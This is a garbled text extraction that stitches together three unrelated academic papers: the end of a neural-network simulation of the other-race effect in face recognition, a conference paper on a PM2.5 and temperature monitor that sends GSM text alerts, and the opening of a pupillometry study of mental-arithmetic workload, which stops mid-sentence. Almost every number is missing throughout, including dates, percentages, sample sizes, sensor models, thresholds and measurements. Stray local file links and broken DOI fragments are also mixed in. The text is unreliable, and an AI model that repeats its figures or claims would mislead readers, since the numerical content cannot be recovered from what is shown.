set. the storage capacity of such a matrix is approximately % of its dimensionality for random vectors (hopfield, ). since the di- mension of our images was very large by compar- ison with the number of stimuli, this limit was not a problem for these simulations. method stimuli. a total of caucasian and japanese faces were digitized from slides with a resolu- tion of grey levels using a fotovix digitizer attached to a -based computer with a -bit targa board (true vision). faces were of young adults and were roughly half male and half female. none of the slides pictured people with facial hair or glasses. the images were aligned so that the eyes were at about the same height. the images were cropped around the face to eliminate cloth- ing. each face was pixels wide and pix- els long, and so was represented by a -pixel vector consisting of the concatenation of the pixels rows. a spatial differentiation encoding was used to enhance lines prior to the extraction of the pixel vector (cf. o’toole et al., ). the simulations were carried out on a sun microsystems sparcsta- tion and on a convex c- vector computer. procedure. two simulations of the other-race effect were performed: one used caucasian faces as the majority race and japanese faces as the mi- nority race, and the other used japanese faces as the majority and caucasian faces as the minority group. for the japanese minority simulation, an associative memory was trained using error correc- tion on caucasian and five japanese faces. for the caucasian minority simulation japanese and five caucasian faces served as the training set . results and discussion representations of majority and minority race faces. the model was tested by reconstructing the japanese and caucasian faces that the model learned (old), and by reconstructing a sample of japanese and caucasian faces not learned by the model (new). the cosine between the origi- nal and reconstructed image indicates the quality of the model’s representation of the face. fig- ure shows the mean cosines for the old and new majority and minority faces for the simu- lations. three points are worth noting. first, in both simulations, the old stimuli (both cau- casian and japanese faces) were nearly perfectly reconstructed (mean cosine= . ). this is a con- sequence of the fact that the capacity of the matrix was not challenged (cf. hopfield, , and be- low). we discuss below one method of degrading the performance of the model in a psychologically interesting way. secondly, the average cosine for the reconstructed new majority faces was greater than the average cosine for the reconstructed new minority faces. this can be seen in the interaction in figure . the differences between the quality of the reconstructions for majority and minority faces reflects the model’s greater success in coding or representing novel faces from the majority race than from the minority race. finally, in both simulations, the cosines for the new faces did not reflect random performance for the model. in other words, the minority race faces were not completely unfamiliar stimuli for the model. this is a consequence of the fact that all faces share a general schema of features and so a given race might be best thought of as a subcate- gory of the general class of face stimuli. similarity. we tested the prediction that novel majority faces are perceived by the model to be less similar to one another (i.e. more distinctive) than minority faces. an analysis of the similar- ity of the reconstructed new faces to one another was carried out. in this analysis, randomly cho- sen new caucasian faces and randomly cho- sen new japanese faces were reconstructed and the model’s estimate of each face was used for this similarity analysis. these stimuli can be thought of as filtered or “perceived” by the matrix trained with a majority and minority race. for each race of faces, the inter-face similarity for the recalled faces the choice of % majority and % minority faces is arbitrary. we have carried out the first set of sim- ulations with % and %, as well, and have found qualitatively similar, though less extreme, results for the model’s ability to represent new majority and minority race faces. o’toole, deffenbacher, abdi, & bartlett was calculated by taking the cosine between all possible pairs of different ‘perceived’ faces. the cosine between two faces indicates the similarity between the two, with identical or scaled faces yielding cosines of . . the average similarity of all possible pairs of reconstructed faces was taken as the average inter-face similarity. several conditions were analyzed. for each ma- jority simulation, the average inter-face similarity of caucasian and japanese faces was computed. furthermore, the reconstructions were carried out using different numbers of eigenvectors to look at the consistency of the similarity effects. to ex- plain this latter analysis, a short digression into the properties of associative matrices is necessary. the reconstruction of any face from the autoas- sociative matrix can be achieved either by equa- tion ( ) or, equivalently, by taking a weighted sum of the eigenvectors of the matrix a, where the weights of each eigenvector for a face fi are equal to the dot-product between the face vector and the eigenvector (multiplied by the eigenvalue of the eigenvector—when error correction is not being used, since error correction has the effect of equal- izing the eigenvalues). for these simulations, error correction was used and so the eigenvalue was not included in the weights. thus, the reconstruction is given by f̂i = (fi · e )e + (fi · e )e + . . . . . . + (fi · e`)e` + ··· + (fi · en)en ( ) where e` indicates the `-th eigenvector. the reconstruction of each face, then, can be quantified precisely by this list of coefficients and the set of eigenvectors of a . returning from our digression, it is dear that a face may be recalled using this second procedure with all or any subset of eigenvectors. since eigenvectors can be ordered by importance of contribution using their associ- ated eigenvalues, we recalled faces using different numbers of eigenvectors to test the consistency of the results as more eigenvectors were included. the results of this analysis appear in figure (a) for the caucasian majority simulation and in figure (b) for the japanese majority simulation. average interface similarity, as defined by the av- erage cosine between all possible pairs of recon- structed faces ( as coded by the set of coefficients used to reconstruct them), appears on the y axis and number of eigenvectors is plotted on the x axis. in both simulations, faces from the minority race were more similar to one another on the average than were faces in the majority race. thus, when the model is trained on a majority of faces of one race and a minority of faces of another race, it cre- ates more distinct codings of majority race faces. this finding is reminiscent of feingold’s ( ) quote. simulation as previously noted, the capacity of an autoas- sociative memory without error correction can be estimated as approximately % of its dimension- ality. this estimate assumes random vectors. the vectors we used were of dimensionality and so the capacity of the memory should be roughly faces. while there are two differences be- tween these simulations and those for which the capacity estimates were derived, these have inverse effects on the capacity estimates. first, we used error correction, which improved the capacity of the matrix. secondly, faces are not random vectors but are highly correlated, a factor that lessens the capacity. in any ease, it is clear from simulation that faces did not challenge the capacities of the matrix. since we had a limited data base of faces, we explored a number of methods for de- grading the system’s performance. at least one of these is interesting psychologically and would merit attention regardless of the performance con- straints. this method draws on the metric multidi- mensional sealing analogy cited previously. multidimensional scaling tries to represent space relations between entities of a stimulus set in the smallest dimensional space possible while accounting for some experimenter-set criterion of variance. the eigenvectors of an associative mem- a strong analogy with metric multidimensional scaling is present here. the axes or dimensions of met- ric multidimensional scaling solutions are the eigen- vectors ordered by the magnitude of their associated eigenvalues. thus, the first axis is the first eigenvec- tor, etc. typically, multidimensional scaling solutions use as many axes as are needed to account for some experimenter-specified proportion of variance. simulating the other-race effect figure . average inter-face similarity for the (a) caucasian and (b) japanese majority ( %) simulations, plotted as a function of the number of eigenvectors used to reconstruct the faces. the minority ( %) race faces for both simulations are more similar to one another than are faces in the majority race. o’toole, deffenbacher, abdi, & bartlett ory are equivalent to the axes of a multidimen- sional scaling solution, with the eigenvector with the largest positive eigenvalue accounting for the largest proportion of variance, and the eigenvector with the second largest eigenvalue accounting for the second largest proportion of variance, and so on. the maximum number of dimensions needed to account for all of the variance is equal to the rank of the matrix (i.e. the number of eigenvectors with non-zero eigenvalues). frequently in multi- dimensional scaling, however, an acceptably large proportion of the variance may be accounted for by a very small set of dimensions and, thus, the eigenvectors with smaller eigenvalues may be dis- carded without losing much information about the structure of the stimulus set. likewise, recall from an associative memory can be carried out using a smaller number of eigen- vectors (cf. equation ( )). the criterion for an ac- ceptable number of dimensions in this case, how- ever, is one that maintains an acceptable (but not perfect) level of recognition performance. recognition memory for same- and other-race faces to simulate a recognition memory task we need to model two components of memory, a long-term experience component (i.e. face race history) and a short-term face recognition task. we expect expe- rience to affect the short-term recognition task in the ways outlined above. for the purpose of com- pleteness, we report two simulations. in the first, we tested the ability of the autoassociative memory to distinguish between old and new faces for a majority matrix. in the second, we added a short- term component to this matrix, which consisted of half caucasian and half japanese faces. we then examined the ability of the model to discriminate old from new faces for these additional faces. we should note that we do not believe that this is the only or even best way to simulate such a task. we feel that it is the simplest way, however, and so we chose to explore this method first. method the matrix was tested for accuracy with a yes/no procedure as follows. learned caucasian and japanese faces (old) and new caucasian and japanese faces were reconstructed. the qual- ity of the reconstructions was measured as the co- sine between the original and reconstructed im- ages. a yes/no recognition procedure was imple- mented by setting a criterion cosine value β and by assigning a ‘yes’ to faces for which the cosine between the original and reconstructed image ex- ceeded the criterion and ‘no’ to faces for which the cosine was less than the criterion β. the most direct choice for β is the mean of the cosine dis- tribution means for the reconstructed old faces and the reconstructed new faces. signal detec- tion methodology maps easily onto this yes/no task since the distribution of cosines for old faces can be thought of as the signal distribution and the distribution of cosines for new faces as the noise distribution. old faces with cosines greater than β are considered hits and new faces with cosines greater than β are considered false alarms. a d′ score may then be computed in the standard way. also, since the distribution of cosines for the signal (i.e. the old faces) and the distribution of cosines for the noise (i.e. the new faces) are known com- pletely, a roc curve may be plotted by choosing β values and calculating the hit and false alarm rates that would result from using these different crite- ria. results and discussion to test the accuracy of the models, we used all of the old faces ( faces: majority and five minority) and a sample of new faces, approx- imately half japanese and half caucasian. the ac- curacy of the model using all the eigenvectors was essentially perfect. we degraded the simulations, therefore, by using smaller numbers of eigenvec- tors. figure (a and b) displays roc curves for the performance of the caucasian and japanese majority models, respectively, with three different numbers of eigenvectors contributing to the recon- struction. for both majority simulations, eigen- vectors yielded excellent performance. dividing the faces into majority and minority face groups did not show the cross-race effect. that is, major- ity faces did not yield larger values of d′. this is likely to be due to the fact that only five minority- simulating the other-race effect figure . roc curves for the performance of the (a) caucasian and (b) japanese majority ( %) models. perfor- mance is plotted with different numbers of eigenvectors contributing to the reconstructions. o’toole, deffenbacher, abdi, & bartlett figure . roc curves for the long-term experience and short-term recognition caucasian majority matrix. race faces were used in these simulations and that race was probably the largest category difference in these simulations and is, therefore, likely to be represented in the first few eigenvectors. we then simulated the short-term component by recalling faces combining the eigenvectors from the long-term majority matrix and the short-term half-caucasian (n = ) and half-japanese (n = ) matrix, weighting the long-term component at . and the short-term component at . . we report a simulation only for the caucasian major- ity matrix . here we see the classic cross-race ef- fect, with the japanese faces being more difficult to recognize (i.e. to separate old from new in the short-term recognition task) than the caucasian faces. the roc curves for this simulation are dis- played in figure . the eigenvectors as features. recalling faces from the autoassociative matrix is carried out by summing together a weighted combination of eigenvectors. that is, the faces are ‘put together’ by adding up the eigenvectors in differentially weighted combinations. as such, by most psycho- logical definitions, the eigenvectors can be thought of as features of the faces. this interpretation of eigenvectors in associative matrices has been pointed out by anderson et al. ( ). also, in the context of low-dimensional representation of images, sirovitch & kirby ( ) suggest an these numbers are arbitrary and are simply an at- tempt to give more weight to the long-term experience than the short-term recognition task. this is because we do not yet have a sufficient number of japanese faces available to complete the analysis for the japanese faces. simulating the other-race effect figure . (a) the first four eigenvectors for the caucasian majority simulation. o’toole, deffenbacher, abdi, & bartlett figure . (b) (b) the first four eigenvectors for the japanese majority simulation. simulating the other-race effect eigenvector-based description. applied to the current work, the eigenvectors of a matrix of face images are a different sort of feature than has generally been used in describ- ing faces. for one thing, the eigenvectors repre- sent global and not local features, since they span the face. secondly, with the exception of the first eigenvector in each of these simulations, the eigen- vectors are not readily interpretable in a traditional feature sense. the first four eigenvectors for the caucasian majority simulation and the japanese majority simulation are displayed in figure (a and b). it should be noted that the eigenvectors are face-like. furthermore, the eigenvectors resemble somewhat the majority race of the matrix. the first eigenvector contains characteristics typical of the majority race (e.g. note the roundness of the eyes and face in the caucasian majority eigenvectors, and the squareness of the face and distinctiveness of the nostrils for the japanese majority eigenvec- tors). finally, for completeness, figure shows the first eigenvector of each majority matrix made from a pixel-based code without spatial differen- tiation. the race differences are even more strik- ing in these cases since shading information is pre- served. general summary and discussion the purpose of these simulations was to model some common effects associated with processing other-race faces. we have tried to show that these effects can be modeled, in part, as a process of fine tuning to the information most useful for distin- guishing faces within a homogenous set (i.e. a sin- gle race of faces). this tuning is suboptimal for processing other-race faces, however, and the sys- tem shows a number of shortcomings for the mi- nority faces as compared to the majority faces. our simulations produced three results. first, when the face history of a network was strongly biased to- ward a single race of faces, the model’s ability to represent novel faces from this race exceeded its ability to represent faces from another race. sec- ondly, an autoassociative network trained on a ma- jority race produced codings that were more sim- ilar to one another for faces of the minority race than for faces of the majority race. this simulates the well-known effect of faces of another race all appearing similar to one another. finally, by com- bining a long-term face history experience matrix with a short-term recognition matrix, we simulated the other-race effect with majority faces being bet- ter recognized than minority faces. while the system produced a number of effects that are qualitatively similar to those seen in the psychological literature, we caution that this ap- proach is perhaps best thought of, not as a model of face recognition, but as an exploratory tool for quantifying and processing subtle perceptual infor- mation in complex images such as faces. it is also, not the only approach to simulating the other-race effect. used in this context, it provides a method for examining other kinds of codings that might account for these effects in a similar fashion. fur- thermore, its application might give insight into the constraints that extensive experience with a given stimulus category place on the processing of stim- uli from another category. we think that this is especially important in cases where it is difficult to quantify the subtle visual information that sepa- rates the categories. finally, we think the model also has potential as a tool for simulating some other well-known ef- fects in face memory, such as the relationship be- tween typicality and recognition memory. further- more, it might be useful for giving insight into the perceptual components of the recognition difficul- ties encountered with inverted faces and with faces presented in the photographic negative. for these effects, it is instructive to pursue some simple per- ceptual explanations before looking at other more complicated explanations. references abdi, h. ( ). a generalized approach for connectionist auto-associative memories: interpre- tation, implications and illustration for face pro- cessing. in j. demongeot (ed.) artificial in- telligence and cognitive sciences. manchester: manchester university press. anderson, j. a., silverstein, j. w., ritz, s. a. & jones, r. s. ( ). distinctive features, cate- gorical perception and probability learning: some o’toole, deffenbacher, abdi, & bartlett figure . the first eigenvector of a caucasian and japanese majority matrix made from a pixel-based code without spatial differentiation. applications of a neural model. psychological re- view, , – . bothwell, r. k., brigham, j. c. & malpass, r. s. ( ). cross-racial identification. personality and social psychology bulletin, , – . brigham, j. c. ( ) the influence of race on face recognition. in h. d. ellis, m. a. jeeves, f. newcombe & a. young (eds) aspects of face processing. dordrecht: martinus nijhoff. brigham, j. c. & barkowitz, p. ( ). do “they all look alike?” the effect of race, sex, ex- perience, and attitudes on the ability to recognize faces. journal of applied social psychology, , – . brigham,j. c., malpass, a., snyder, l. s. & spaulding, k. ( ). the accuracy of eyewitness identification in a field setting. journal of person- ality and social psychology, , – . chance, j. e., turner, a. l. & goldstein, a. g. ( ). development of differential recognition of own-and other-race faces. journal of psychology, , – . cross, j. g., cross, j. & daly, j. ( ). sex, race, age and beauty as factors in recognition of faces. perception & psychophysics, , – . deffenbacher, k. a. & loftus, e. f. ( ). do jurors share a common understanding concerning eyewitness behavior? law and human behavior, , – . feingold, c. a. ( ). the influence of envi- ronment on identification of persons and things. journal of criminal law and police science, , – . feinman, s. & entwistle, d. r. ( ). chil- dren’s ability to recognize other children’s faces. child development, , – . simulating the other-race effect goldstein, a. g. & chance, j. e. ( ). effects of training on japanese face recognition: reduc- tion of the other-race effect. bulletin of the psy- chonomic society, , – . hopfield, j. j. ( ). neurons with graded re- sponses have collective computational properties like those of two-state neurons. proceedings of the national academy of sciences, , – . kohonen, t. ( ). self organization and as- sociative memory. berlin: springer verlag. malpass, r. s. ( ) training in face recog- nition. in g. davies, h. ellis & j. shepherd (eds) perceiving and remembering faces. lon- don: academic press, pp. - . o’toole, a. j. & abdi, h. ( ). connection- ists approaches to visually based feature extrac- tion. in g. tiberghien (ed.) advances in cognitive psychology, vol. . london: wiley. o’toole, a. j., millward, r. b. & anderson, j. a. ( ). a physical system approach to recogni- tion memory for spatially transformed faces. neu- ral networks, , – . shapiro, p. n. & penod, s. d. ( ). meta- analysis of face identification studies. psychologi- cal bulletin, , – . sirovitch, l. &. kirby, m. ( ). low- dimensional procedure for the characterization of human faces. journal of the optical society of america, , – . paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) the monitoring and wireless transmission system of pm . in the scenic wang xiaohui school of leisure management xi’an eurasia university xi’an, china e-mail: wangxiaohui@eurasia.edu lei kewei school of leisure management xi’an eurasia university xi’an, china e-mail: leikewei@eurasia.edu abstract—this scenic area has large traffic volume and complex environment and some scenic areas need to be protected. so developing an air quality monitoring system is very important. in this paper, the temperature sensor, the pm . sensor and the wireless transmission module were combined by the mcu. it monitors the spot in pm . concentration and the temperature information. when the pm . concentration is higher than the threshold, the wireless transmission module sends the warning signal. so the system could measure and improve the environment of scenic spot. keywords-pm . sensor; dust monitoring; temperature sensor; sim a i. introduction with the rapid development of the industrial level, the air quality in daily life is getting worse. especially when the people are densely poured into the scenic area, the ambient air quality is even worse[ ]. therefore, how to effectively collect the pm . in the scenic core area and transmit data in time is a difficult problem to be solved[ ]. in recent years, the minimum system is used in the dust monitoring with the advantages of small size, powerful function and the low cost[ ]. so the application of the pm . sensor and the wireless transmission system based on c board can ensure the physical and mental safety in the scenic area for the tourists. ii. analysis of the system architecture a. system hardware architecture the system based on c single chip is composed of the data acquisition module, the key circuit, the alarm module and the gsm wireless transmission module. the structure of the system is shown in figure . as shown in figure , the system can collect the pm . and the temperature data in a certain area through the dust particle sensor and the temperature sensor. because the analog signal could not processed by the mcu, so using ds ad conversion module to convert the analog signal to the digital signal and then transmit the data to the mcu and displayed on the lcd screen. at the same time, the mcu compares the collected data with the threshold, if the collected value is higher than the threshold, the buzzer will alarm and send the pm . concentration and the current temperature information to the user with the short message[ ]. stc c ( mcu) dust particle sensor a/ d conversion ( ad ) gsm sms sending module mobile phone lcd c ircuit b temperature sensor key c ircuit alarm module ( buzzer) digital signal analog signal analog signal collection of information alarm instruction figure . system structure diagram b. pm . dust sensor module the selection of the pm . dust sensor affects the range and precision of the monitoring module directly. gp y au f dust concentration sensor was used in this paper. from table , the working voltage of the dust concentration sensor module is the same with the single chip. its high accuracy meets the requirements of the majority of users. the large temperature range can be applied to all kinds of bad environment. in general, more than mg/m of pm . can cause harm to the human body, so this module's range is sufficient. table . characteristics of dust concentration sensor characteristic input voltage (v) current(ma) precision(µm) index . ~ . < . characteristic working temperature(℃) range(mg/m ) sensitivity index - ~+ ~ . . v/ . mg dust sensor is used to measure the dust concentration in the air by the reflection principle of dust. the internal structure of the dust concentration sensor is shown in figure . international conference on sensor network and computer engineering (icsnce ) amplifier circuit case pd v-led rsdust or smoke particle dust through .hole led-gnd s-gnd vo vcc led ired figure . the structure of the dust concentration sensor table . dust sensor pin pin description v gnd pulse gnd output voltage v function control the receiving pd control the sending ired the function and pin of the dust sensor is shown in table . with the received pulse signal and the output voltage signal from the single chip, the dust sensor controls the receiving device pd (photo detector). the sending device ired (infrared light emitting diode) feeds the mcu with the dust concentration in the form of voltage. there are two transistors ired and pd inside the dust sensor. the ired emits the light and the pd receives the light signals reflected back by the dust. when the module works normally, the ired emits the light. if the dust particle is enough, the reflected light will received by pd, the intensity of the light signal will change the pd voltage. then with the higher output voltage of the dust particles, the concentration of pm . becomes higher. c. ds temperature sensor module a dsl digital thermometer provides nine bits (binary) temperature readings and the single chip can communicate with ds . each ds has a specific sequence number. multiple ds can work on the same bus without worrying lack of the bus. the pin of the ds is shown in figure : gnd vcc r p . ds . k figure . the pin of the ds the measurement range of the dsl from - ℃ to ℃. two eight bits temperature values were stored. the ds has two power supply mode: data bus power supply mode and external power supply mode. the first mode uses less wire but less efficiency. the latter used a single wire but faster. the ds interface specifications: pin one is the ground; pin two connects the single chip p for data transmission; pin three connects vcc. ds stored the with the nine bits temperature value. the highest bit is the symbol bit. the temperature storage of ds is shown in table . when the temperature is negative s= , when it is positive s= . such as: aah indicates + ℃, h is ℃ and ff h is - ℃. table . ds storage bit bit bit bit bit bit bit bit bit ls byte ^ ^ ^ ^ ^ ^ ^ ^ bit bit bit bit bit bit bit bit bit ms byte s s s s s s s s d. gsm wireless communication module gsm (global system of mobile) is the second generation of the mobile communication technology. it promotes the globalization of the world and makes the users use one mobile phone to communicate around the world. so they produced a unified standard of the mobile phone network, namely the gsm. gsm wireless communication module adopts the simcom's sim a module to realize the function of the short message. the sim a module supports most g or g mobile communications services. the ttl serial port and the rs module can be used for debugging. the sim a module has the function of the power self-starter. firstly, the sim card is placed in the slot and then the working mode of the sim a is shown in table : table . the working mode of the sim a d d working status long bright quick flashing searching net long bright slow flashing normal working over lighting long and off short low power off slow flashing send ring off one time and long bright slow flashing receive one message gsm module realizes the function of sms through sim a chip controlling the sim card module and other modules. nowadays it is widely used in china. e. design the system software at first, the system initializes the flash, the port and the lcd etc[ ]. then the sensor begins work and the data collection is achieved. after the ad converted, the data is displayed on the lcd . at this time, if the data is higher than the threshold, the buzzer alarms and the data is sent to the user's mobile phone through the gsm wireless file:///c:/program% files/common% files/dict/ . . . /resultui/dict/ file:///c:/program% files/common% files/dict/ . . . /resultui/dict/ file:///c:/program% files/common% files/dict/ . . . /resultui/dict/ file:///c:/program% files/common% files/dict/ . . . /resultui/dict/ file:///c:/program% files/common% files/dict/ . . . /resultui/dict/ international conference on sensor network and computer engineering (icsnce ) transmission module to complete the alarm function[ ]. the software process is shown in figure . start system initialization ad conversion send alarm or message end press button data > threshold display pm . and temperature modify the threshold y n y n figure . the flow chart of the system iii. acquisition and transmission a. data collection of the pm . the data collection of the dust concentration is the key of the software programming. the data collection and processing of pm . concentration is introduced in figure . start initialization open led conversion to digital signal collect times analog siganl median filer display result calculation of pm . conversion to voltage value y n end figure . pm . collection flow chart when the power turns on, the dust monitoring sensor initializes[ ]. then the pm . sensor is waiting for the instruction from the mcu. when it receives the instruction, the sensor turns on the ired to data acquisition, pd (photo detector) will receive the reflected light signal, and the light intensity will affect the voltage across the pd, which is sent to the mcu[ ]. after received the voltage signal, the mcu controls ad begin a/d conversion and the collected information send to the lcd , so the data acquisition is completed. b. the temperature data collection the ds temperature sensor collects the temperature and returns the digital information[ ].as shown in figure , after initialization, the sensor reads the data in rom: the serial number and the temperature information of ds [ ]. the general delay s can read the temperature information, and then the pointer in the buffer is added to the next data reading[ ]. initialization read rom initialization delay sencond read memory data processing initialization buffer pointer add one y end start figure . the flow chart of temperature collection iv. system test results the system platform is placed in the core area of the scenic area, and the sensor is opened to collect and transmit the surrounding environment parameters in real time[ ]. the data collection is divided into two parts: the dust concentration acquisition and the temperature acquisition. as shown in figure (a), the lcd lcd displays the temperature and pm . concentration when the system is monitored. at this time the temperature is . ℃, and the concentration of pm . is . mg/m . the concentration threshold of the pm . can be set by the key circuit and the pm . concentration threshold is set to . mg/m . temp: . ℃ pm . : . mg/m pm . alarm set . mg/m (a) (b) figure . data collection and concentration setting diagram when the concentration of pm . exceeds the threshold, the display information on the lcd lcd screen is shown in figure (a). at present, the concentration of pm . is . mg/m , which exceeds the threshold . mg/m , so the gsm wireless transmission module sends the alarm information to the user, as shown in figure (b). at this time, the user sees the pm . concentration alarm. the temperature is . ℃, and the concentration of pm . is . mg/m , which is the same as the alarm information on lcd lcd screen. international conference on sensor network and computer engineering (icsnce ) temp: . ℃ pm . : . mg/m pm . alarm! t: . ℃ p: . mg/m (a) (b) figure . system alarm and sms through the monitoring system, the user can see the surrounding environmental parameters of the monitored area in time. so the problem of environmental monitoring in the scenic core area can be solved through the platform. v. conclusions the monitoring system for the pm . concentration and the real-time temperature is designed in this paper. the collected data was transmitted by the wireless transmission module based on the mcu. when the pm . concentration is higher than a threshold, the buzzer alarms and the current environment information is sent to the mobile phone. because the low cost and the highly performance characteristic, so it can be applied to the high-density areas. acknowledgment this work was partly supported by shaanxi province social science fund project (no. r ) of china and by the scientific research fund project of shaanxi provincial department of education ( jk ). references [ ] g.xu, x.yang, and q.yang, et al. “design on magnetic coupling r esonance wireless energy transmission and monitoring system for i mplanted devices”, ieee transactions on applied superconductivity, vol. , apr. , pp. - , doi: . /tasc. . j. [ ] r.prakash, a.b.ganesh, and s. v.girish. “cooperative wireless netw ork control based health and activity monitoring system”, journal of medical systems, vol. , oct. , pp. , doi:: . /s - - - . [ ] j. c.heo, b.kim, and y. n.kim, et al. “induction of inflammation in vivo by electrocardiogram sensor operation using wireless power transmission”, sensors, vol. , dec. , pp. , doi: . /s . [ ] t.liang, y.j.yuan. “wearable medical monitoring systems based on wireless networks: a review”, ieee sensors journal, vol. , aug. , pp. - , doi: . /jsen. . . [ ] q.zheng, h.zhang, and b.shi, et al. “in vivo self-powered wireless cardiac monitoring via implantable triboelectric nanogenerator”, ac s nano, vol. , jul. , pp. , doi: . /acsnano. b . [ ] g.anfuso, a.t.williams, and g.c.martínez. “evaluation of the scenic value of beaches in cuba: implications for coastal tourism management”, ocean & coastal management, vol. , may. , pp. - , doi: . /j.ocecoaman. . . . [ ] s.shi, z.wu, and f.liu, et al. “retention of atmospheric particles by local plant leaves in the mount wutai scenic area, china”, atmosphere, vol. , aug. , pp. , doi: . /atmos . [ ] p.chen, y.q.lian. “modeling of soil loss and its impact factors in the guijiang karst river basin in southern china”, environmental earth sciences, vol. , apr. , pp. , doi: . /s - - -z. [ ] j.guo, f.xia, and y.zhang. “impact of diurnal variability and meteorological factors on the pm . -aod relationship: implications for pm . remote sensing”, environmental pollution, vol. , nov. , pp. , doi: . /j.envpol. . . . [ ] s.samiksha, r.r.sunder, and nirmalkar j. “pm and pm . chemical source profiles with optical attenuation and health risk indicators of paved and unpaved road dust in bhopal, india”, environmental pollution, vol. , nov. , pp. - . doi.org/ . /j.envpol. . . . [ ] s.k.r.boreddy, t.mochizuki, and kawamura k, et al. “homologous series of low molecular weight (c -c ) monocarboxylic acids, benzoic acid and hydroxyacids in fine-mode (pm . ) aerosols over the bay of bengal: influence of heterogeneity in air masses and formation pathways”, atmospheric environment, vol. , oct. , pp. - , doi: . /j.atmosenv. . . . [ ] h.m.lee, r.j.park, and henze d k, et al. “pm . source attribution for seoul in may from to using geos-chem and its adjoint model”, environmental pollution, vol. , nov. , pp. .- , doi: . /j.envpol. . . . https://doi.org/ . /tasc. . https://doi.org/ . /s - - - https://doi.org/ . /s - - - http://dx.doi.org/ . /s http://dx.doi.org/ . /s https://doi.org/ . /jsen. . https://doi.org/ . /j.envpol. . . workload assessment for mental arithmetic tasks using the task-evoked pupillary response submitted may accepted july published august corresponding author joost de winter, j.c.f.dewinter@tudelft.nl academic editor helen petrie additional information and declarations can be found on page doi . /peerj-cs. copyright marquart and de winter distributed under creative commons cc-by . open access workload assessment for mental arithmetic tasks using the task-evoked pupillary response gerhard marquart and joost de winter department of biomechanical engineering, faculty of mechanical, maritime and materials engineering, delft university of technology, delft, the netherlands abstract pupillometry is a promising method for assessing mental workload and could be helpful in the optimization of systems that involve human–computer interaction. the present study focuses on replicating the studies by ahern ( ) and klingner ( ), which found that for three levels of difficulty of mental multiplications, the more difficult multiplications yielded larger dilations of the pupil. using a remote eye tracker, our research expands upon these two previous studies by statistically testing for each . s interval of the calculation period ( ) the mean absolute pupil diameter (mpd), ( ) the mean pupil diameter change (mpdc) with respect to the pupil diameter during the pre-stimulus accommodation period, and ( ) the mean pupil diameter change rate (mpdcr). an additional novelty of our research is that we compared the pupil diameter measures with a self-report measure of workload, the nasa task load index (nasa-tlx), and with the mean blink rate (mbr). the results showed that the findings of ahern and klingner were replicated, and that the mpd and mpdc discriminated just as well between the lowest and highest difficulty levels as did the nasa-tlx. the mbr, on the other hand, did not differentiate between the difficulty levels. moderate to strong correlations were found between the mpdc and the proportion of incorrect responses, indicating that the mpdc was higher for participants with a poorer performance. for practical applications, validity could be improved by combining pupillometry with other physiological techniques. subjects human–computer interaction keywords pupillometry, human factors, pupil diameter, cognitive load introduction mental workload is an important psychological construct that is challenging to assess on a continuous basis. a commonly used definition of mental workload is the one proposed by hart & staveland ( ). these authors defined workload as “the cost incurred by a human operator to achieve a particular level of performance.” (p. ). a valid and reliable assessment method of workload could be helpful in the optimization of systems that involve human–computer interaction, such as vehicles, computers, and simulators. one promising method for measuring workload is pupillometry, which is the measurement of the pupil diameter (e.g., goldinger & papesh, ; granholm & steinhauer, ; klingner, kumar & hanrahan, ; laeng, sirois & gredebäck, ; marshall, ; palinko et al., ; schwalm, keinath & zimmer, ). how to cite this article marquart and de winter ( ), workload assessment for mental arithmetic tasks using the task-evoked pupillary response. peerj comput. sci. :e ; doi . /peerj-cs. mailto:j.c.f.dewinter@tudelft.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. two antagonistic muscles regulate the pupil size: the sphincter and the dilator muscle. activation of these muscles results in the contraction and dilation of the pupil, respectively. during a mentally demanding task, the pupils have been found to dilate up to . mm, which is small compared to the maximum dilation of about mm caused by changes in lighting conditions (e.g., beatty & lucero-wagoner, ). the involuntary reaction of the pupil to changes in task conditions is also called the task-evoked pupillary response (tepr; beatty, ). in the past, teprs were obtained at – hz by motion picture photography (hess & polt, ). this required researchers to measure the pupil diameter manually frame by frame (janisse, ). nowadays, remote non-obtrusive eye trackers are increasingly being used to automatically measure teprs, as these devices are getting more and more accurate. over the years, researchers have encountered a few challenges in pupillometry. reflexes of the pupil to changes in luminance, for example, may undermine the validity of teprs. one way to improve validity is to strictly control the luminance of the experimental stimuli, but this limits the usability of pupillometry. marshall ( ) reported she found a way to filter out the pupil light reflex using wavelet transform techniques. she patented this method and dubbed it the “index of cognitive activity”. the influence of gaze direction on the measured pupil size is another issue. where pomplun & sunkara ( ) reported a systematic dependence of pupil size on gaze direction, klingner, kumar & hanrahan ( ) argued that the ellipse-fitting method for the estimation of the pupil size is not affected by perspective distortion. in the last few decades many researchers have investigated the pupillary response for different types of tasks. typically, the dilation was found to be higher for more challenging tasks (ahern, ; kahneman & beatty, ), including mental arithmetic tasks (boersma et al., ; bradshaw, ; hess & polt, ; schaefer et al., ). not only task demands have been found to influence the pupil diameter, but also factors like anxiety, stress, and fatigue. tryon ( ) and janisse ( ) extensively reviewed known sources of variation in pupil size. back then, janisse ( ) commented on the underexplored area of whether pupillary dilations reliably reflect individual differences in intelligence. ahern ( ) discovered that persons scoring higher on intelligence tests showed smaller pupillary dilations on tasks of fixed difficulty. in a more recent study, van der meer et al. ( ) found greater pupil dilations for individuals with high intelligence than with low intelligence during the execution of geometric analogy tasks. thus, the results are not consistent and demand further investigation. the present study focuses on replicating the pupil diameter study by ahern ( ) for mental multiplications of varying levels of difficulty. ahern ( ) found that the more difficult multiplications yielded a greater mean pupil diameter. in her research, ahern ( ) used a so-called television pupillometer (whittaker s) that was able to measure the pupil diameter in real-time. specifically, the device processed images obtained from an infrared video camera, identified the pupil diameter using a pattern-recognition algorithm, and computed the diameter of the image of the pupil (beatty & wilson, ). participants used a chin-rest and infrared eye illuminator, and the camera was positioned marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. approximately cm from the participant’s left eye. our study is also intended as a follow-up study of klingner ( ). klingner ( ) recently replicated ahern’s ( ) results with a remote eye tracker (tobii ) having a similar working principle as the eye tracker used by ahern ( ). in klingner ( ), the participants sat approximately cm from the screen and infrared cameras, and they did not use a chin-rest or head-mounted equipment. in his analyses, klingner ( ) used the average of the two eyes’ pupil diameters. with a large number of participants ( in our study, in 